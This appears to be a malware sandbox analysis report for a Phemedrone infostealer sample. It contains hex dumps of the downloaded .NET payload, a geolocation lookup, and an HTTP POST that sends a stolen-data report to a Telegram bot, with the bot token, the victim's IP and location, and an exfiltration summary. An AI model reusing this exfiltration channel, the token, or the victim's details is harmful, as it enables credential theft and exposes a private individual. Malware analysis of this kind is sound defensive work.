                                                            2024-11-04 08:42:18 UTC16384INData Raw: 00 00 0a 2a 2e 72 e5 87 00 70 80 78 01 00 04 2a 00 00 50 4b 01 02 17 0b 14 00 00 01 02 03 04 06 08 08 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 50 4b 06 06 50 4b 03 04 14 00 50 4b 05 06 00 00 00 00 50 4b 06 07 42 53 4a 42 01 00 01 00 00 00 00 00 0c 00 00 00 76 34 2e 30 2e 33 30 33 31 39 00 00 00 00 05 00 6c 00 00 00 5c 64 00 00 23 7e 00 00 c8 64 00 00 e8 2f 00 00 23 53 74 72 69 6e 67 73 00 00 00 00 b0 94 00 00 08 88 00 00 23 55 53 00 b8 1c 01 00 10 00 00 00 23 47 55 49 44 00 00 00 c8 1c 01 00 28 26 00 00 23 42 6c 6f 62 00 00 00 00 00 00 00 02 00 00 0a 57 bf a2 3f 09 1e 00 00 00 fa 01 33 00 16 c4 00 01 00 00 00 b0 00 00 00 a5 00 00 00 78 01 00 00 45 02 00 00 4f 02 00 00 0c 00 00 00 24 02 00 00 5b 00 00 00 e2 00 00 00 12 00 00 00 03 00 00 00 8c 00 00 00 21
                                                            Data Ascii: *.rpx*PKPKPKPKPKBSJBv4.0.30319l\d#~d/#Strings#US#GUID(&#BlobW?3xEO$[!
                                                            2024-11-04 08:42:18 UTC16384INData Raw: 7d 1c 00 00 02 00 b2 26 00 00 03 00 95 1a 00 00 04 00 f9 28 00 00 01 00 06 2a 00 00 01 00 f9 28 00 00 02 00 28 10 00 00 01 00 ba 28 00 20 02 00 d0 2e 00 00 03 00 0b 2c 00 00 04 00 02 2c 00 00 05 00 ef 29 00 00 06 00 b2 26 00 00 01 00 ba 28 00 20 02 00 d0 2e 00 00 03 00 0b 2c 00 00 04 00 02 2c 00 00 05 00 ef 29 00 00 06 00 b2 26 00 00 07 00 95 1a 00 00 08 00 f9 28 00 00 01 00 ef 29 00 00 02 00 06 2a 00 00 01 00 f9 28 00 00 02 00 28 10 00 00 01 00 ba 28 00 20 02 00 d0 2e 00 00 03 00 fa 2b 00 00 04 00 f2 2b 00 00 05 00 aa 26 00 00 01 00 ba 28 00 20 02 00 d0 2e 00 00 03 00 fa 2b 00 00 04 00 f2 2b 00 00 05 00 aa 26 00 00 06 00 95 1a 00 00 07 00 f9 28 00 00 01 00 06 2a 00 00 01 00 f9 28 00 00 02 00 28 10 00 00 01 00 7d 1c 00 00 02 00 9c 2d 00 20 03 00 27 14 02
                                                            Data Ascii: }&(*((( .,,)&( .,,)&()*((( .++&( .++&(*((}- '
                                                            2024-11-04 08:42:18 UTC16384INData Raw: 6d 6f 6c 65 6b 00 42 61 72 79 66 65 6c 65 66 61 78 6f 6b 00 4e 69 76 6f 76 6f 6b 75 78 6f 62 69 6e 79 68 75 6b 00 41 6c 6c 6f 63 48 47 6c 6f 62 61 6c 00 46 72 65 65 48 47 6c 6f 62 61 6c 00 4d 61 72 73 68 61 6c 00 53 79 73 74 65 6d 2e 43 6f 6d 70 6f 6e 65 6e 74 4d 6f 64 65 6c 00 4e 79 6c 69 74 69 6a 79 73 61 6d 6f 66 69 6c 00 4b 61 70 79 63 69 74 6f 74 75 78 69 6c 00 4b 65 72 6e 65 6c 33 32 2e 64 6c 6c 00 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 00 75 73 65 72 33 32 2e 64 6c 6c 00 6e 74 64 6c 6c 2e 64 6c 6c 00 72 73 74 72 74 6d 67 72 2e 64 6c 6c 00 4b 69 6c 6c 00 53 79 73 74 65 6d 2e 58 6d 6c 00 73 65 74 5f 53 65 63 75 72 69 74 79 50 72 6f 74 6f 63 6f 6c 00 75 72 6c 00 67 65 74 5f 42 61 73 65 53 74 72 65 61 6d 00 44 65 66 6c 61 74 65 53 74 72 65 61 6d 00 4e 65
                                                            Data Ascii: molekBaryfelefaxokNivovokuxobinyhukAllocHGlobalFreeHGlobalMarshalSystem.ComponentModelNylitijysamofilKapycitotuxilKernel32.dllkernel32.dlluser32.dllntdll.dllrstrtmgr.dllKillSystem.Xmlset_SecurityProtocolurlget_BaseStreamDeflateStreamNe
                                                            2024-11-04 08:42:19 UTC16384INData Raw: 00 44 00 51 00 41 00 56 00 42 00 67 00 4d 00 4e 00 48 00 56 00 68 00 61 00 45 00 31 00 41 00 66 00 45 00 77 00 34 00 59 00 43 00 41 00 77 00 50 00 41 00 52 00 73 00 47 00 42 00 68 00 73 00 3d 00 00 11 64 00 6b 00 45 00 4d 00 58 00 67 00 6f 00 3d 00 00 59 55 00 46 00 34 00 65 00 55 00 42 00 63 00 42 00 44 00 78 00 38 00 47 00 42 00 77 00 30 00 51 00 45 00 41 00 77 00 45 00 45 00 46 00 39 00 54 00 48 00 46 00 6f 00 58 00 44 00 41 00 63 00 57 00 43 00 41 00 63 00 43 00 46 00 41 00 59 00 4b 00 43 00 68 00 6b 00 3d 00 00 21 63 00 30 00 45 00 58 00 46 00 6a 00 34 00 4d 00 42 00 78 00 67 00 4f 00 44 00 77 00 3d 00 3d 00 00 59 55 00 6c 00 30 00 63 00 57 00 68 00 6f 00 41 00 44 00 78 00 30 00 4a 00 43 00 77 00 63 00 55 00 45 00 41 00 30 00 4a 00 45 00 6c 00 70 00
                                                            Data Ascii: DQAVBgMNHVhaE1AfEw4YCAwPARsGBhs=dkEMXgo=YUF4eUBcBDx8GBw0QEAwEEF9THFoXDAcWCAcCFAYKChk=!c0EXFj4MBxgODw==YUl0cWhoADx0JCwcUEA0JElp
                                                            2024-11-04 08:42:19 UTC16384INData Raw: 00 00 21 55 00 31 00 30 00 4c 00 52 00 68 00 38 00 43 00 48 00 44 00 38 00 44 00 42 00 77 00 73 00 3d 00 00 09 62 00 77 00 59 00 3d 00 00 09 44 00 51 00 3d 00 3d 00 00 61 5a 00 48 00 45 00 30 00 63 00 7a 00 41 00 33 00 52 00 56 00 74 00 43 00 4c 00 44 00 77 00 2b 00 4f 00 30 00 6b 00 38 00 48 00 46 00 6b 00 48 00 53 00 6d 00 6b 00 6c 00 43 00 67 00 45 00 55 00 44 00 53 00 6b 00 42 00 48 00 77 00 49 00 62 00 42 00 42 00 6c 00 62 00 55 00 51 00 6f 00 3d 00 00 51 5a 00 48 00 45 00 30 00 63 00 7a 00 41 00 33 00 52 00 56 00 74 00 43 00 4c 00 44 00 77 00 2b 00 4f 00 30 00 6b 00 38 00 48 00 46 00 6b 00 48 00 53 00 6d 00 6b 00 6a 00 45 00 51 00 6f 00 53 00 42 00 78 00 6b 00 64 00 48 00 67 00 51 00 3d 00 00 61 5a 00 48 00 45 00 30 00 63 00 7a 00 41 00 33 00 52 00
                                                            Data Ascii: !U10LRh8CHD8DBws=bwY=DQ==aZHE0czA3RVtCLDw+O0k8HFkHSmklCgEUDSkBHwIbBBlbUQo=QZHE0czA3RVtCLDw+O0k8HFkHSmkjEQoSBxkdHgQ=aZHE0czA3R
                                                            2024-11-04 08:42:19 UTC16384INData Raw: 15 12 0c 02 15 12 08 02 0e 0e 0e 0e 0e 0e 0e 0e 2d 06 15 12 80 8d 02 15 12 20 02 15 12 1c 02 15 12 18 02 15 12 14 02 15 12 10 02 15 12 0c 02 15 12 08 02 0e 0e 0e 0e 0e 0e 0e 0e 12 82 5c 06 15 12 08 02 0e 0e 09 20 01 15 12 08 02 0e 0e 0e 0b 15 12 0c 02 15 12 08 02 0e 0e 0e 13 20 01 15 12 0c 02 15 12 08 02 0e 0e 0e 15 12 08 02 0e 0e 10 15 12 10 02 15 12 0c 02 15 12 08 02 0e 0e 0e 0e 1d 20 01 15 12 10 02 15 12 0c 02 15 12 08 02 0e 0e 0e 0e 15 12 0c 02 15 12 08 02 0e 0e 0e 15 15 12 14 02 15 12 10 02 15 12 0c 02 15 12 08 02 0e 0e 0e 0e 0e 27 20 01 15 12 14 02 15 12 10 02 15 12 0c 02 15 12 08 02 0e 0e 0e 0e 0e 15 12 10 02 15 12 0c 02 15 12 08 02 0e 0e 0e 0e 1a 15 12 18 02 15 12 14 02 15 12 10 02 15 12 0c 02 15 12 08 02 0e 0e 0e 0e 0e 0e 31 20 01 15 12 18 02 15
                                                            Data Ascii: - \ ' 1


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.849706172.67.70.2334437560C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-11-04 08:42:21 UTC76OUTGET /v1/ip/geo.json HTTP/1.1
                                                            Host: get.geojs.io
                                                            Connection: Keep-Alive
                                                            2024-11-04 08:42:21 UTC1101INHTTP/1.1 200 OK
                                                            Date: Mon, 04 Nov 2024 08:42:21 GMT
                                                            Content-Type: application/json
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-request-id: 9ada6b320ca7dea66c4b7802d777725a-ASH
                                                            strict-transport-security: max-age=15552000; includeSubDomains; preload
                                                            access-control-allow-origin: *
                                                            access-control-allow-methods: GET
                                                            pragma: no-cache
                                                            Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            geojs-backend: ash-01
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TlakeSXxQgUpdC6ZlueOat1eF5bVjCT%2BJMMoCVqNVFVv2OfaQWqH5HXXnXAarEbeYYRvQNPc3HMwsU39C8%2FJXpVtB9otO%2Fn%2FTIAyqLqjAjtZdwV%2BGTxrkhy3wrQdoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            X-Content-Type-Options: nosniff
                                                            Server: cloudflare
                                                            CF-RAY: 8dd34f6bcbe82cc6-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1726&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=690&delivery_rate=1795412&cwnd=251&unsent_bytes=0&cid=8b23f7b6cc676abd&ts=238&x=0"
                                                            2024-11-04 08:42:21 UTC268INData Raw: 31 35 66 0d 0a 7b 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 43 68 69 63 61 67 6f 22 2c 22 69 70 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 41 53 38 31 30 30 20 41 53 4e 2d 51 55 41 44 52 41 4e 45 54 2d 47 4c 4f 42 41 4c 22 2c 22 61 73 6e 22 3a 38 31 30 30 2c 22 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 5f 6e 61 6d 65 22 3a 22 41 53 4e 2d 51 55 41 44 52 41 4e 45 54 2d 47 4c 4f 42 41 4c 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 61 72 65 61 5f 63 6f 64 65 22 3a 22
                                                            Data Ascii: 15f{"timezone":"America\/Chicago","ip":"173.254.250.69","organization":"AS8100 ASN-QUADRANET-GLOBAL","asn":8100,"city":"Killeen","organization_name":"ASN-QUADRANET-GLOBAL","country_code":"US","country":"United States","continent_code":"NA","area_code":"
                                                            2024-11-04 08:42:21 UTC90INData Raw: 54 65 78 61 73 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 22 33 31 2e 30 30 36 35 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 39 37 2e 38 34 30 36 22 2c 22 61 63 63 75 72 61 63 79 22 3a 32 30 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 33 22 3a 22 55 53 41 22 7d 0a 0d 0a
                                                            Data Ascii: Texas","latitude":"31.0065","longitude":"-97.8406","accuracy":20,"country_code3":"USA"}
                                                            2024-11-04 08:42:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.849707149.154.167.2204437560C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-11-04 08:42:25 UTC384OUTPOST /bot8091768794:AAFZsJ1h-6BiszgyLm-eH6c-uITQ7Z99Wbc/sendDocument HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600
                                                            Content-Type: multipart/form-data; boundary=----------------------------8dcfc82b23332ca
                                                            Host: api.telegram.org
                                                            Content-Length: 239842
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            2024-11-04 08:42:26 UTC25INHTTP/1.1 100 Continue
                                                            2024-11-04 08:42:26 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 63 38 32 62 32 33 33 33 32 63 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5b 55 53 5d 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 2d 50 68 65 6d 65 64 72 6f 6e 65 2d 52 65 70 6f 72 74 2e 70 68 65 6d 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 5a 7d 33 ae c7 9c 5a 60 0d 0e fe f0 9e 06 58 7b e5 6d 69 a4 a5 b4 7c a6 98 83 14 e7 10 56 ae 69 29 14 b7 dd 93 ee 32 f7 9d 1e fc e5 2e 30 17 3a 0e 47 ec 1b c2 be 53 88 5d 1f e2 c5 54 02 f1
                                                            Data Ascii: ------------------------------8dcfc82b23332caContent-Disposition: form-data; name="document"; filename="[US]173.254.250.69-Phemedrone-Report.phem"Content-Type: application/octet-streamZ}3Z`X{mi|Vi)2.0:GS]T
                                                            2024-11-04 08:42:26 UTC16355OUTData Raw: 32 29 2c 34 4a 4c a5 4f ad ad 7e a1 e2 83 f0 a0 88 80 8f 87 c1 6d d3 68 09 18 c9 ce b3 9a 7f 0c bd 39 91 69 83 4b d5 bc 63 2d 77 1d 29 8f 2b 97 91 63 c4 5f 32 69 05 78 2d d9 24 d1 c4 4f eb 9b 2d 7b 84 a3 08 c6 da 69 77 c8 5e bf 90 49 44 f0 fc 2d d9 31 34 86 6d 6e b2 4b d4 64 5d 8b 44 a0 d4 8f 24 08 ae 80 f9 e2 18 56 f3 9c 08 b9 02 1f 8a f4 f8 8c b8 5d 92 19 ef 31 4d 13 57 09 39 02 4c 0f 74 70 fd cc dd e1 b4 06 97 3c be 51 d0 8f 46 2e 13 56 e4 d8 f6 f5 91 8d 35 40 d6 2f b7 28 1e db 24 48 60 bb c1 77 01 37 b0 56 aa df 1d 3e 4a 8f 90 0a 5f fe 82 09 fb be 52 a7 8c a0 79 e5 e7 be 43 fa ef 8a a8 95 66 ab cd 0c 2c c2 f9 f1 c8 d8 5b a2 80 67 73 ad 16 ae 28 83 05 47 53 31 ea 47 7c 97 6b 96 8a 95 98 68 54 7a d2 ed 10 87 5f 5c f7 fb 4e 87 67 87 8b 59 90 37 48 7f a9
                                                            Data Ascii: 2),4JLO~mh9iKc-w)+c_2ix-$O-{iw^ID-14mnKd]D$V]1MW9Ltp<QF.V5@/($H`w7V>J_RyCf,[gs(GS1G|khTz_\NgY7H
                                                            2024-11-04 08:42:26 UTC16355OUTData Raw: da 49 9b f1 32 56 50 05 44 de f6 13 6d c7 84 9a 8c 4d e5 3c 41 8a 26 af af e7 90 99 a3 56 d1 c4 d0 7a b5 df 24 16 8f 8b 15 07 cf 07 aa a0 56 f4 a6 c8 ce 3b b7 96 ce 2f c0 2b 21 ef 0b 74 30 5d 2e 78 31 cd 03 e6 b9 c1 22 08 19 b5 b4 b5 b9 51 57 de f9 5c 34 73 67 ac a8 e5 8c dc 06 6a 41 45 65 f6 63 75 b9 8b 81 b1 d1 60 b4 0d 9a 44 f0 50 96 89 2d 82 ae 2d 95 9c 15 0d a0 2c c4 fc c9 29 a4 c6 18 d5 a8 f7 eb ba da 4f c0 fc 28 9a 1c 37 fc db 11 5e 68 27 13 a1 06 c9 97 42 a4 52 13 a1 a2 8f 6d bc 33 99 1d 4f 33 78 2d 69 fa 0f 40 40 85 52 5c 77 d1 29 c3 9b c2 ad d9 d2 70 83 29 8a 4b 8d 4b e2 36 92 02 ab 88 3f a6 00 d1 46 7a ac 2d 1c d3 da 59 0b 2b f3 6e 40 09 0b 00 5c 91 5c 24 c6 82 6b 6e 50 c5 ae 03 b6 a1 96 8e 39 57 72 40 be b6 52 c3 b3 21 ce a7 da d3 ea 39 5e b6
                                                            Data Ascii: I2VPDmM<A&Vz$V;/+!t0].x1"QW\4sgjAEecu`DP--,)O(7^h'BRm3O3x-i@@R\w)p)KK6?Fz-Y+n@\\$knP9Wr@R!9^
                                                            2024-11-04 08:42:26 UTC16355OUTData Raw: 66 0c 33 88 9e 75 5c b7 cf 6e 26 03 fc 13 c3 80 69 8b 51 6c 3e 7f d4 8f 09 e3 45 14 06 63 ca 28 f1 57 10 0b aa fd 64 1c 03 72 81 1f 30 68 18 21 f1 c5 7d e8 2b 0e 84 f8 13 d1 d6 d9 49 77 c7 3e 55 04 d7 42 a2 e2 ab 22 7a 53 7a 4e b5 6a 32 ac 3c b6 56 8a f3 1e 25 a1 83 69 26 5e ac fc ce 47 ee 5b f8 88 5f db f4 7f e0 28 5e 09 28 61 50 2f 82 a7 c9 6e 28 ce 24 06 ca 52 c6 93 9b f5 05 34 91 2e dd 3c 53 7a 87 71 62 a2 a0 d4 d6 ff df 82 77 f5 4c a2 55 1a b1 fd 63 3a dd 54 71 37 8b 2c 02 f4 ef 0e 88 ef 90 69 1c fe 39 5e ba 2c 62 ad 4e d7 ce a6 9f a3 96 1f bb ba 4e 66 be b4 9b 92 ac 65 37 7a c9 57 0a bc fb 0a 71 b2 7c 8e 37 83 3c a0 94 f8 0c f6 da ad a6 58 44 05 9d 85 f0 57 3a 0a c7 0c 2b a5 47 e2 73 2c ea d3 b6 80 d1 27 13 ce 61 67 ac 86 65 e2 86 6d 3e d8 93 01 e6
                                                            Data Ascii: f3u\n&iQl>Ec(Wdr0h!}+Iw>UB"zSzNj2<V%i&^G[_(^(aP/n($R4.<SzqbwLUc:Tq7,i9^,bNNfe7zWq|7<XDW:+Gs,'agem>
                                                            2024-11-04 08:42:26 UTC16355OUTData Raw: f1 62 8c 0f 54 5c 13 fa 85 1d 2c fb 99 41 77 03 fc 64 87 a0 7f a2 e8 87 8d b0 eb 58 88 dd ba fd 96 63 f5 a4 3b ad 06 70 c1 15 bd 2b 4c a4 98 59 14 7e 4e f8 d0 32 46 09 52 7c a1 85 6b fb b2 86 59 6a 82 a4 f3 4f 6b 04 4f 49 83 3d d5 50 58 b6 1f 79 24 c2 2d 26 1d 6c 0e 7b a4 db 1d 36 52 e3 28 3a 59 66 76 85 0d f3 ba fa e1 a0 78 75 d8 c5 97 cf e5 57 1c 03 74 df ff 50 94 ed f8 ad 84 ec f1 03 47 b6 2c 95 8f a1 3b 9e fa fb bf e2 a3 71 d2 10 f8 6d 4b b6 af 5c 90 f9 1d a8 95 14 50 a5 93 15 cd 3e 8a 91 eb a6 f3 84 69 f8 6a 7c 91 cd 2f dd 90 22 64 48 10 f5 19 46 01 7d 74 dd 63 49 8e 3f ee e4 fb 77 67 29 e2 80 c2 09 18 b8 06 d6 4c 31 92 85 29 88 fc 2f 4e e2 17 b8 6a 1e 55 db 37 8a bf da 6c 26 62 12 94 66 d2 a9 f9 be c8 6a 77 b9 88 a7 bc 57 02 08 6f 8c 13 04 f4 c8 2f
                                                            Data Ascii: bT\,AwdXc;p+LY~N2FR|kYjOkOI=PXy$-&l{6R(:YfvxuWtPG,;qmK\P>ij|/"dHF}tcI?wg)L1)/NjU7l&bfjwWo/
                                                            2024-11-04 08:42:26 UTC145OUTData Raw: 9d ba 2a 8e 70 a4 31 d5 60 f6 9e 72 b1 a0 35 44 aa ba 8c 94 c9 3d 06 de f1 07 91 ca ea 9d a9 86 ae 7f 7d 71 ed 2d e3 36 6d 73 fa 2d e0 ea 98 3b be 2c dc 47 a8 a0 64 43 84 ca ab 34 ac b0 3f 5f ab 8e 7d be 51 bc 1b 2e 9a 94 3a f9 16 cd b8 44 7b ef 86 27 e9 fa 6a d6 74 c1 ec 8e 9f e8 d8 4f df 56 7d 8f 3b f0 90 40 5a f0 92 0f 65 0a f5 8a 5b c5 55 09 7b 0b b8 0d ec d4 8d 8a 77 60 28 3f 28 9f b8 70 ed 46 51 22 52 90 b4 16 69 2c 3c 96 db
                                                            Data Ascii: *p1`r5D=}q-6ms-;,GdC4?_}Q.:D{'jtOV};@Ze[U{w`(?(pFQ"Ri,<
                                                            2024-11-04 08:42:26 UTC16355OUTData Raw: e4 16 d8 21 38 9e 93 f0 fd 07 05 8b c4 45 25 89 85 16 7d 2b 95 ce 6d ac 35 60 bf 26 c5 8a 2a 0b 1c c4 22 63 4f da ab 3f e2 6e 28 2d d8 37 58 bf 69 20 e0 53 51 de ce d1 4a 36 12 e9 c6 fd 9e cd 91 dc b1 ca 41 eb a8 46 fe 4d 50 8b e4 cc 62 df 36 c7 0a 6b fe 24 29 39 45 b3 57 32 f5 86 a6 9a c2 2e 3e f8 3f 97 bf d8 36 50 38 f2 34 38 a1 5f 21 da ba 49 56 28 07 47 55 d2 8a 7b 60 ee 9f 55 34 63 0e 2b 0a f5 24 e4 fc f5 f6 d2 21 fe a2 8f 86 78 1b d3 8a f8 c0 50 c2 fb 8e 3b 11 a8 94 d0 d3 8f a3 5d 71 4a d6 99 5f c8 12 32 e8 d4 c0 72 54 97 9e e8 94 06 39 7c 8f ff 2b 49 d3 bc f9 3b 06 6a ce 26 66 70 5f 23 dd 3c cd c8 67 31 55 22 7e a6 58 73 fe 15 9f 44 1b 81 cc 15 ce ea de 75 f8 73 43 30 28 52 0f 02 0a 71 74 20 a7 bb c0 4e 0f 08 dc aa dc d1 25 ba c5 c4 35 44 ca 5d 08
                                                            Data Ascii: !8E%}+m5`&*"cO?n(-7Xi SQJ6AFMPb6k$)9EW2.>?6P848_!IV(GU{`U4c+$!xP;]qJ_2rT9|+I;j&fp_#<g1U"~XsDusC0(Rqt N%5D]
                                                            2024-11-04 08:42:26 UTC16355OUTData Raw: e6 33 fb 78 dc 7d ed e9 78 fb ea 95 4e 54 c4 71 96 f3 ca 79 80 e0 cc 86 fa 9e 88 88 45 50 48 70 0c 81 f5 48 96 95 49 7d 19 c1 28 a0 a1 ba 92 3a cb 8b f1 da 09 46 af 4e 7a ca 6c 74 2a f4 ee 9f f5 9b fe 0a 3c fb 54 85 49 90 6e 7c 33 3d 73 b0 55 c5 01 cf 8f d4 9c a4 4c 37 69 c7 93 5a db e0 f4 4b 1f d3 21 ed 70 fe 67 b8 5b 50 e6 5d 78 e6 69 b4 d8 d8 3c 1a 5a 64 ed a1 a5 b5 18 c8 7c 8f 25 26 b0 dc d2 d1 a1 f7 2b 86 f4 0d 2f 92 20 c1 b6 d1 ae 5f a1 88 fa af 1a e4 75 24 5a 42 6c af e3 52 a7 03 ca 4c dd 3e c4 e7 fc 26 cb dc 3d 86 c8 5a ed 45 48 11 e7 73 b1 1f c5 d3 a1 d1 6c 43 8d 00 51 b0 a5 a5 b4 43 00 ed 1c c9 3f fb d6 ac be 83 08 62 33 5a 1e 6c 4c c9 2a 0f 23 2a 7f 9e f9 3e 12 27 35 b5 ba 88 67 aa 4d 25 d6 c3 67 46 8d cc 0f c1 06 f6 87 9a a5 17 e6 f7 2c 4e 39
                                                            Data Ascii: 3x}xNTqyEPHpHI}(:FNzlt*<TIn|3=sUL7iZK!pg[P]xi<Zd|%&+/ _u$ZBlRL>&=ZEHslCQC?b3ZlL*#*>'5gM%gF,N9
                                                            2024-11-04 08:42:26 UTC16355OUTData Raw: a7 b3 54 87 f5 1c 7c 3a e0 f8 9f e3 d3 04 fe 58 83 15 84 35 db d3 9e e3 19 68 58 84 6d d5 28 f3 1e 4c 73 0d 80 44 7d d6 a0 a9 af c5 2e 7d 7f c5 b6 b5 bf fb 95 67 97 00 2a 5b 9f 84 34 b3 74 78 10 9e 65 ac 36 5f 71 94 3b cc 54 63 e1 2f 20 46 90 7c ee d8 f6 33 ae d8 a8 ed b9 3e 50 a8 48 28 c5 ee ad 50 f4 c4 bb ae 7f 3b 68 e5 77 c1 9a db 14 fc 52 3f d1 b4 aa 95 57 5f 14 5c 48 a5 39 49 ec b6 bd 76 20 1b db 94 1f 0d b5 66 4d 7f f4 0b e1 4d 91 f5 b4 8d 10 94 c2 92 35 9f 40 7e e9 af e6 53 12 79 26 9c 34 63 2c 7c 47 4c 94 4f 6c 35 7b dd 65 89 e7 0a a5 52 c0 f8 05 e7 d5 20 81 74 d1 cf b4 7e f2 16 8a 3f a0 ed 82 77 b6 af 12 bb da cd a9 72 08 f7 c8 83 c1 b3 8c f7 0b 26 e6 76 f8 78 a5 e5 50 12 13 78 a0 99 98 bd cd 05 94 d7 a5 e2 05 71 86 da 6b 38 70 99 8d 2e 2c ea ca
                                                            Data Ascii: T|:X5hXm(LsD}.}g*[4txe6_q;Tc/ F|3>PH(P;hwR?W_\H9Iv fMM5@~Sy&4c,|GLOl5{eR t~?wr&vxPxqk8p.,
                                                            2024-11-04 08:42:26 UTC16355OUTData Raw: d7 d3 aa 3e c4 ec ac 90 34 c0 83 09 9a e7 e5 90 e7 89 2e de 68 e0 be 38 df 98 b0 3a ff 53 25 84 d1 09 5e 3e b9 a9 5e f5 07 66 31 e5 e3 bb 4d bf 0d 70 35 8f a2 a5 d1 c1 12 7d 2f 88 c5 38 35 fd aa df 4a 38 1a 3c bd 5d c7 66 cc c1 5b d8 6c 3e 2a 2c 9b 93 e2 fc 89 e6 fa 8c d3 d3 10 e1 71 67 ec 1d db d8 03 89 5c 59 59 c3 ce 77 2a 0c 5a 5d 98 36 11 22 6a da 28 68 78 53 09 90 e6 28 44 b1 73 dc f2 09 eb c1 a0 9a c4 24 c7 11 bb e1 5c 59 b1 55 34 78 44 30 d4 ab 74 60 98 09 0b b8 70 c8 3c 21 c3 e0 76 a7 60 40 18 e9 9b 08 dd 20 82 6c 59 67 61 a5 a5 95 28 18 99 b7 21 8f ab f3 38 0b 33 81 8f c1 8d 53 b4 66 02 b2 02 01 c2 90 a4 26 36 25 d4 e0 a5 d3 81 9b 8c 62 ad 80 42 82 c2 fd 07 91 ad f7 16 ce af b9 4f 5a c2 35 29 6b 96 f8 f0 3b c6 f7 65 37 9c 2c 8b ab 1e 10 3d 6e 24
                                                            Data Ascii: >4.h8:S%^>^f1Mp5}/85J8<]f[l>*,qg\YYw*Z]6"j(hxS(Ds$\YU4xD0t`p<!v`@ lYga(!83Sf&6%bBOZ5)k;e7,=n$
                                                            2024-11-04 08:42:26 UTC1263INHTTP/1.1 200 OK
                                                            Server: nginx/1.18.0
                                                            Date: Mon, 04 Nov 2024 08:42:26 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 875
                                                            Connection: close
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                            {"ok":true,"result":{"message_id":271,"from":{"id":8091768794,"is_bot":true,"first_name":"phstl","username":"phstlbot"},"chat":{"id":-4536956662,"title":"phstl","type":"group","all_members_are_administrators":true},"date":1730709746,"document":{"file_name":"[US]173.254.250.69-Phemedrone-Report.phem","file_id":"BQACAgIAAxkDAAIBD2coiPJQF4lS8f5hVIYO9dZr4d2kAAIWbQACb2FASXUbBEmhaymFNgQ","file_unique_id":"AgADFm0AAm9hQEk","file_size":239072},"caption":"Phemedrone Stealer Report | by @webster480 & @TheDyer\n\n - IP: 173.254.250.69 (United States)\n - Tag: video (Vosilyn)\n - Passwords: 0\n - Cookies: 2\n - Wallets: 0\n\n\n\n\n@freakcodingspot","caption_entities":[{"offset":0,"length":25,"type":"bold"},{"offset":31,"length":11,"type":"mention"},{"offset":45,"length":8,"type":"mention"},{"offset":55,"length":106,"type":"pre"},{"offset":165,"length":16,"type":"mention"}]}}


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:03:42:13
                                                            Start date:04/11/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\upd.ps1"
                                                            Imagebase:0x7ff6cb6b0000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
